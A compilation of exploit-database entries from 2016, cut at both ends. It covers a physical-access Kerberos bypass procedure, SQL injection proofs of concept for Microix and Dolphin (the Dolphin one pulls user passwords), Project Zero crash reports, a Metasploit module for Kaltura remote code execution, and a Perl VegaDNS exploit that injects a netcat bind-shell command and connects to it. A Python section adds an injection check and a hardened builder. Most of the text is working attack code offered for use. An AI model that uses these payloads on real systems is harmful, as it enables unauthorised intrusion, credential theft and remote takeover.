September 20, 2016 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
# Exploit Title: Kerberos Security Feature Bypass Vulnerability (Kerberos to NTLM Fallback)
# Date: 22-09-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64) and Windows 10 x64
# CVE : CVE-2016-3237
# Category: Local Exploits & Privilege Escalation
SPECIAL CONFIG: Standard Domain Member configuration with password caching enabled (default), BitLocker enabled without PIN or USB key.
REPRODUCE:
Prerequisites:
- Standard Windows 7/10 Fully patched (up until 08/08/2016) and member of an existing domain.
- BitLocker enabled without PIN or USB key.
- Password Caching enabled
- Victim has cached credentials stored on the system from previous logon.
This vulnerability has a similar attack path as MS15-122 and MS16-014 but bypasses the published remediation.
STEP 1: Obtain physical access to a desktop or laptop with the above configuration.
STEP 2: Boot the system and determine the FQDN of the device (e.g. CLIENT.domain.local); this can be obtained by monitoring the network broadcast communication the system sends prior to logging in. The username can be extracted from the login screen (e.g. USER1).
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login.
STEP 5: Login on the target machine and proceed to the change login screen.
STEP 6: Disable the following (Inbound) Firewall Rules:
- Kerberos Key Distribution Center - PCR (TCP and UDP)
- Kerberos Key Distribution Center (TCP and UDP)
STEP 7: Change the password. (Changing Password screen will appear to hang)
STEP 8: Wait 1 minute before re-enabling the firewall rules defined in STEP 6
STEP 9: Enable firewall rules again and after a few seconds the password should be successfully changed.
STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed."
STEP 11: Disconnect Target system's network connection.
STEP 12: Login with the new changed password.
IMPACT: Access gained to the information stored to the target system without previous knowledge of password or any other information. This could also be used to elevate your privileges to local Administrator.
Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)
# Exploit Title: Microix timesheet module SQL Injection
# Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
# Date: 2016-09-06
# Software Link: http://www.microix.net/workflow-modules/timesheet-module/
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://www.3fforensics.com/
# CVE:
# Category: webapps
1. Description
Microix timeclock is vulnerable to a SQL injection. The field that is injectable is:
ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID
Initial contact attempt: 08/22/2016
2nd attempt: 08/29/2016
3rd attempt: 09/05/2016
4th attempt: 09/21/2016
2. Proof of Concept
POST /microixcloud/ HTTP/1.1
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin
3. Solution:
None
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867
In issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.
I had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.
Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.
As in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40405.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000
Attached crashing file: 3525170180.ppt
Crashing context:
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
Call Stack:
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0024e330 663088cc 1979aea0 0024e46c 00000000 ppcore!DllGetLCID+0x18205e
0024e350 663072cb 0024e46c e437cde4 00000000 ppcore!DllGetLCID+0x182052
0024e4c8 662fcbda 1cd76fe8 0024e4f0 0024e574 ppcore!DllGetLCID+0x180a51
0024e598 662fc9ee 00000000 0024e5e0 0024e63e ppcore!DllGetLCID+0x176360
0024e5ac 662e82fd 0024e5e0 0024e63e e4362e14 ppcore!DllGetLCID+0x176174
00250738 662e7c88 17802ef8 073def40 1638bb50 ppcore!DllGetLCID+0x161a83
00250774 6619d3e9 002508a4 00250890 1638bb50 ppcore!DllGetLCID+0x16140e
Disassembly:
663088d2 55 push ebp
663088d3 8bec mov ebp,esp
663088d5 8b4d08 mov ecx,dword ptr [ebp+8]
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
The ecx register is pointing to invalid memory in this crash. Looking at the call stack and disassembly above we can see that this value was passed in as the first argument to the crashing function. The calling function obtained this value from a pointer in stack memory at 0x0024e46c + 0x10:
0:000> dd poi(0024e46c)
1cb7cfa0 00000000 1cb7cfa0 00000002 19045ea0
1cb7cfb0 1979aea0 00000000 00000000 00000000
We can verify that this is allocated memory and find the function that allocated it:
(address changed between runs and is now 0x1cb7cfa0)
0:000> !heap -p -a 1cb7cfa0
address 1cb7cfa0 found in
_DPH_HEAP_ROOT @ 1261000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1d2b14e0: 1cb7cfa0 5c - 1cb7c000 2000
6f748e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
7719616e ntdll!RtlDebugAllocateHeap+0x00000030
7715a08b ntdll!RtlpAllocateHeap+0x000000c4
77125920 ntdll!RtlAllocateHeap+0x0000023a
72eaad1a vrfcore!VerifierSetAPIClassName+0x000000aa
701f16ac vfbasics+0x000116ac
641a6cca mso!Ordinal149+0x000078e0
66118132 ppcore!PPMain+0x00001244
662fcbda ppcore!DllGetLCID+0x00176360
662fc9ee ppcore!DllGetLCID+0x00176174
662e82fd ppcore!DllGetLCID+0x00161a83
Setting breakpoints on ppcore!DllGetLCID+0x00176360 and subsequent memory write access breakpoints at eax+0x10 (there are multiple hits) eventually resulted in the same file crashing with a different context:
eax=00000000 ebx=17c2cb50 ecx=00000000 edx=00000000 esi=1a36eea0 edi=1a36eea0
eip=6625a361 esp=0022e1d0 ebp=0022e1f8 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293
ppcore!DllGetLCID+0xd3ae7:
6625a361 8b4870 mov ecx,dword ptr [eax+70h] ds:0023:00000070=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0022e1f8 662d7d30 661813c4 ec3f4e62 00000000 ppcore!DllGetLCID+0xd3ae7
0022e220 663088e2 00000000 661813c4 0022e250 ppcore!DllGetLCID+0x1514b6
0022e230 663088cc 1a36eea0 0022e36c 00000000 ppcore!DllGetLCID+0x182068
0022e250 663072cb 0022e36c ec3f4f8a 00000000 ppcore!DllGetLCID+0x182052
0022e3c8 662fcbda 1c7a4fe8 0022e3f0 0022e474 ppcore!DllGetLCID+0x180a
Given the different crashing contexts related to timing when breakpoints are set I suspect this to be a heap corruption bug that Application Verifier does not detect.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40406.zip
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
2. Proof of Concept
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
which is rendered as:
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
3. Solution:
Update to version 7.3.1
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Kaltura Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits an Object Injection vulnerability in Kaltura.
        By exploiting this vulnerability, unauthenticated users can execute
        arbitrary code under the context of the web server user.
        Kaltura has a module named keditorservices that takes user input
        and then uses it as an unserialized function parameter. The constructed
        object is based on the SektionEins Zend code execution POP chain PoC,
        with a minor modification to ensure Kaltura processes it and the
        Zend_Log function's __destruct() method is called. Kaltura versions
        prior to 11.1.0-2 are affected by this issue.
        This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Security-Assessment.com', # discovery
          'Mehmet Ince <mehmet@mehmetince.net>' # msf module
        ],
      'References'     =>
        [
          ['EDB', '39563']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Mar 15 2016',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
      ]
    )
  end

  def check
    r = rand_text_alpha(15 + rand(4))
    cmd = "print_r(#{r}).die()"

    p = ""
    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
      'vars_get' => {
        'kdata' => Rex::Text.encode_base64(p)
      }
    )

    if res && res.body.include?(r)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"

    p = ""
    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
      'vars_get' => {
        'kdata' => Rex::Text.encode_base64(p)
      }
    )
  end
end
#!/usr/bin/perl
$izd= qq{
██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗
██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝
██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝
██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║
╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
};$vg=qq{
▀ ▐░░▄ ▄▄▄▄▄▄▄
▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌
▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌
▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄
▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄
▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓
▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░
▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░
▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒
█░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒
▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒
▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░
█░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒
▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒
▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒
▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓
▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒
▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄
▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌
▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░
▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌
▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀
▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒
▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█
▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒
▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒
▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░
▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒
▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌
▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌
░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄
░ ▓ ▓▒░ ░░▒▀▒░▒▄
▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒
░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀
░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄
▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░
▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄
▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄
▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄
▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄
▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓
▐▓▓░▒▓▓▓▓▓▓▓
▐▓▓▓▓▓▓▒▒▓▌
▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
██▒░░░░░░░▓▓███
};$b=qq{
██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗
██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝
██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗
╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║
╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║
╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝
██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗
██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗
██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
██████╗ ██████╗ ███████╗███████╗████████╗███████╗
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝
██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝
╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
█████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗
██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝
███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗
██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║
██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that are derived from user input. This
allows an attacker to inject shell syntax constructs and take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted through the $domain variable, which is itself tainted by direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable that is built from $domain.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
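The same command construction rebuilt in Python as an added example (not VegaDNS code), with a check that counts the shell control operators left outside quotes, beside a hardened builder. The value of $dns_tools_dir and the simplified escapeshellcmd() stand-in are assumptions of this example.

```python
import re
import shlex
from secrets import token_hex
from typing import List

DNS_TOOLS_DIR = "/usr/local/bin"  # assumed value for the page's $dns_tools_dir

# Simplified stand-in for PHP escapeshellcmd(): backslash-escapes shell
# metacharacters (PHP also special-cases unpaired quotes; not needed here).
_META = set("#&;`|*?~<>^()[]{}$\\'\"\n")


def escapeshellcmd(value: str) -> str:
    return "".join("\\" + c if c in _META else c for c in value)


def build_command_vulnerable(hostname: str, domain: str, rand: int) -> str:
    """Mirrors axfr_get.php: $domain is escaped where it is an argument, but the
    $file path derived from it is interpolated raw into the shell command."""
    file = f"/tmp/{domain}.{rand}"
    return (f"{DNS_TOOLS_DIR}/tcpclient -R '{escapeshellcmd(hostname)}' 53 "
            f"{DNS_TOOLS_DIR}/axfr-get '{escapeshellcmd(domain)}' "
            f"{file} {file}.tmp 2>&1")


def injected_operators(command: str) -> List[str]:
    """Tokenise like a POSIX shell and return the control operators (';', '|',
    '&', '&&', '||') that appear outside quotes: each one starts a new command.
    Redirections such as '>&' are not reported."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok and set(tok) <= set(";|&")]


_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_DNS_NAME = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")


def is_dns_name(value: str) -> bool:
    """Allow-list check: only hostname syntax (RFC 1123 labels) gets through."""
    return len(value) <= 253 and _DNS_NAME.fullmatch(value) is not None


def build_command_hardened(hostname: str, domain: str) -> List[str]:
    """Validate both inputs, never derive a path from user input, and return an
    argv list to run without a shell, so there is nothing left to escape."""
    if not (is_dns_name(hostname) and is_dns_name(domain)):
        raise ValueError("hostname and domain must be valid DNS names")
    file = f"/tmp/axfr-{token_hex(8)}"  # random name, unrelated to the domain
    return [f"{DNS_TOOLS_DIR}/tcpclient", "-R", hostname, "53",
            f"{DNS_TOOLS_DIR}/axfr-get", domain, file, file + ".tmp"]
```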
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit; }
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk
